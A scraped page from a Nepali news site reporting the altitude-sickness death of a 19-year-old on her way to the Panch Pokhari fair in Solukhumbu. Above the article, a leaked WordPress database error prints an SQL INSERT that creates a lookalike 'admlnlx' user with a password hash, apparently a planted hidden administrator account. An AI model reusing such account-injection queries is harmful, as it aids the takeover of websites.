WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIT0jsjiYnGKYbDza07Wz3KZd5zRLX.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 08:21:06', '', 'admlnlx', 'admlnlx')

पाँच पोखरी मेला जानेक्रममा लेक लागेर एक किशोरीको मृत्यु – Gaule Khabar

पाँच पोखरी मेला जानेक्रममा लेक लागेर एक किशोरीको मृत्यु

पाँच पोखरी मेला जानेक्रममा लेक लागेर एक किशोरीको मृत्यु

गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बुको महाकुलुङ गाउँपालिका स्थित पाँपोखरी मेला जाने क्रममा एक किशोरीको लेक लागेर मृत्यु भएको छ ।
महाकुलुङ स्थित पाचपोखरी मेलामा अस्थायी पसल सञ्चालन गर्न जादै गर्दा छेस्काम निवासी १९ बर्षीय भविकुमारी कुलुङको मृत्यु भएको हो ।
शुक्रबार पाँपोखरी जानेक्रममा लेक लागेर बिरामी भएको उपचारको लागि घरतर्फ फकाईदै गर्दा शनिवार चौतारमा ज्यान गएको महाकुलुङ स्थित प्रहरी इन्चार्जले जानकरी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका